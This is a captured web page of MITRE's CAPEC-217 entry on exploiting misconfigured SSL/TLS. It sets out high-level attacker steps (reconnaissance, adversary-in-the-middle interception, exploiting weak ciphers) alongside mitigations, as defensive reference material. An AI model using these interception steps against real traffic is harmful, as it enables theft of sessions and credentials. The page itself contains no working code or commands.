capec.mitre.org Open in urlscan Pro
192.52.194.205  Public Scan

Form analysis
1 forms found in the DOM

/cgi-bin/jumpmenu.cgi

<form action="/cgi-bin/jumpmenu.cgi" style="margin-bottom:0.1em;vertical-align:center;">
  <label for="id" style="padding-right:5px">ID Lookup:</label>
  <input id="id" name="id" type="text" style="width:50px; font-size:80%" maxlength="10">
  <input value="Go" style="padding: 0px; font-size:80%" type="submit">
</form>

Text Content

COMMON ATTACK PATTERN ENUMERATION AND CLASSIFICATION

A Community Resource for Identifying and Understanding Attacks



Home > CAPEC List > CAPEC-217: Exploiting Incorrectly Configured SSL/TLS
(Version 3.9)  
ID Lookup:

--------------------------------------------------------------------------------

 * Home
 * About
   Overview Board Glossary Use Cases Resources Documents FAQs New to CAPEC?
 * CAPEC List
   Latest Version Downloads Reports Archive
 * Community
   Community Citations Organization Usage Related Activities Discussion List
   Discussion Archives CAPEC User Summit
 * News
   Current News CAPEC on Twitter CAPEC on LinkedIn CAPEC Blog CAPEC Podcast
   CAPEC on YouTube News Archive
 * Search


CAPEC-217: EXPLOITING INCORRECTLY CONFIGURED SSL/TLS

Attack Pattern ID: 217
Abstraction: Standard

View customized information:
Conceptual Operational Mapping-Friendly Complete
Description
An adversary takes advantage of incorrectly configured SSL/TLS communications
that enables access to data intended to be encrypted. The adversary may also use
this type of attack to inject commands or other traffic into the encrypted
stream to cause compromise of either the client or server.
Extended Description
SSL/TLS communications become vulnerable to this attack when they use outdated
versions and insecure ciphers. Currently, all SSL versions are deprecated and
TLS versions 1.0 and 1.1 are also deprecated due to being insecure. It is still
possible for later versions of TLS to be insecure if they are configured with
insecure ciphers such as 3DES or RC4.
Likelihood Of Attack

Low

Relationships
This table shows the other attack patterns and high level categories that are
related to this attack pattern. These relationships are defined as ChildOf and
ParentOf, and give insight to similar items that may exist at higher and lower
levels of abstraction. In addition, relationships such as CanFollow, PeerOf, and
CanAlsoBe are defined to show similar attack patterns that the user may want to
explore.

NatureTypeIDNameChildOfMeta Attack Pattern - A meta level attack pattern in
CAPEC is a decidedly abstract characterization of a specific methodology or
technique used in an attack. A meta attack pattern is often void of a specific
technology or implementation and is meant to provide an understanding of a high
level approach. A meta level attack pattern is a generalization of related group
of standard level attack patterns. Meta level attack patterns are particularly
useful for architecture and design level threat modeling
exercises.216Communication Channel Manipulation

This table shows the views that this attack pattern belongs to and top level
categories within that view.

View NameTop Level CategoriesDomains of AttackCommunicationsMechanisms of
AttackAbuse Existing Functionality

Execution Flow
Explore

 1. Determine SSL/TLS Configuration: Determine the SSL/TLS configuration of
    either the server or client being targeted, preferably both. This is not a
    hard requirement, as the adversary can simply assume commonly exploitable
    configuration settings and indiscriminately attempt them.
    
    TechniquesIf the target is a webpage, some of the SSL/TLS configuration can
    be viewed through the browser's security information, such as the key sizes
    and cipher being used.

Experiment

 1. Intercept Communication: Provide controlled access to the server by the
    client, by either providing a link for the client to click on, or by
    positioning one's self at a place on the network to intercept and control
    the flow of data between client and server, e.g. AiTM (adversary in the
    middle - CAPEC-94).
    
    TechniquesCreate a malicious webpage that looks identical to the target
    webpage, but routes client traffic to the server such that the adversary can
    observe the traffic and perform an adverary in the middle attack. If the
    adversary has access to the network that either the client or server is on,
    the can attempt to use a packet sniffer to perform an adversary in the
    middle attack. Install a packet sniffer through malware directly to a client
    device that can intercept SSL/TLS traffic and perform an adversary in the
    middle attack.

Exploit

 1. Capture or Manipulate Sensitive Data: Once the adversary has the ability to
    intercept the secure communication, they exploit the incorrectly configured
    SSL to view the encrypted communication. The adversary can choose to just
    record the secure communication or manipulate the data to achieve a desired
    effect.
    
    TechniquesUse known exploits for old SSL and TLS versions. Use known
    exploits for weak ciphers such as DES and RC4.

Prerequisites

Access to the client/server stream.

Skills Required
[Level: High]
The adversary needs real-time access to network traffic in such a manner that
the adversary can grab needed information from the SSL stream, possibly
influence the decided-upon encryption method and options, and perform automated
analysis to decipher encrypted material recovered. Tools exist to automate part
of the tasks, but to successfully use these tools in an attack scenario requires
detailed understanding of the underlying principles.

Resources Required

The adversary needs the ability to sniff traffic, and optionally be able to
route said traffic to a system where the sniffing of traffic can take place, and
act upon the recovered traffic in real time.

Consequences
This table specifies different individual consequences associated with the
attack pattern. The Scope identifies the security property that is violated,
while the Impact describes the negative technical impact that arises if an
adversary succeeds in their attack. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a
pattern will be used to achieve a certain impact, but a low likelihood that it
will be exploited to achieve a different impact.

ScopeImpactLikelihood
Confidentiality
Read Data
Confidentiality
Access Control
Authorization
Gain Privileges

Mitigations

Do not use SSL, as all SSL versions have been broken and should not be used. If
TLS is not an option for the client or server, consider setting timeouts on SSL
sessions to extremely low values to lessen the potential impact. Only use TLS
version 1.2+, as versions 1.0 and 1.1 are insecure. Configure TLS to use secure
algorithms. The current recommendation is to use ECDH, ECDSA, AES256-GCM, and
SHA384 for the most security.

Example Instances

Using MITM techniques, an adversary launches a blockwise chosen-boundary attack
to obtain plaintext HTTP headers by taking advantage of an SSL session using an
encryption protocol in CBC mode with chained initialization vectors (IV). This
allows the adversary to recover session IDs, authentication cookies, and
possibly other valuable data that can be used for further exploitation.
Additionally this could allow for the insertion of data into the stream,
allowing for additional attacks (CSRF, SQL inject, etc) to occur.

Related Weaknesses
A Related Weakness relationship associates a weakness with this attack pattern.
Each association implies a weakness that must exist for a given attack to be
successful. If multiple weaknesses are associated with the attack pattern, then
any of the weaknesses (but not necessarily all) may be present for the attack to
be successful. Each related weakness is identified by a CWE identifier.

CWE-IDWeakness Name 201Insertion of Sensitive Information Into Sent Data

Content History

SubmissionsSubmission DateSubmitterOrganization2014-06-23
(Version 2.6)
CAPEC Content TeamThe MITRE CorporationModificationsModification
DateModifierOrganization2015-12-07
(Version 2.8)
CAPEC Content TeamThe MITRE CorporationUpdated Description Summary2021-06-24
(Version 3.5)
CAPEC Content TeamThe MITRE CorporationUpdated Execution_Flow2022-02-22
(Version 3.7)
CAPEC Content TeamThe MITRE CorporationUpdated @Name, Description,
Example_Instances, Execution_Flow, Extended_Description, Mitigations,
Resources_Required, Skills_RequiredPrevious Entry NamesChange DatePrevious Entry
Name2015-12-07
(Version 2.8)
Exploiting Incorrectly Configured SSL Security Levels2022-02-22
(Version 3.7)
Exploiting Incorrectly Configured SSL

More information is available — Please select a different filter.

Page Last Updated or Reviewed: February 22, 2022
 

Site Map | Terms of Use | Manage Cookies | Cookie Notice | Privacy Policy |
Contact Us |

Use of the Common Attack Pattern Enumeration and Classification (CAPEC), and the
associated references from this website are subject to the Terms of Use. CAPEC
is sponsored by the U.S. Department of Homeland Security (DHS) Cybersecurity and
Infrastructure Security Agency (CISA) and managed by the Homeland Security
Systems Engineering and Development Institute (HSSEDI) which is operated by The
MITRE Corporation (MITRE). Copyright © 2007–2023, The MITRE Corporation. CAPEC
and the CAPEC logo are trademarks of The MITRE Corporation.